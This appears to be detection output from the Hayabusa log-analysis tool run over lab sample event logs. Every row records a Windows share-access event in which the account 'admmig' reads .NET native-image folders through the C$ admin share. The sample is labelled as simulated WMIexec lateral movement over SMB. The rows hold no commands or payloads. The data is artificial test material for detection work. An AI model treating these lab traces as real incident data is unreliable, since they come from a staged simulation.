2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
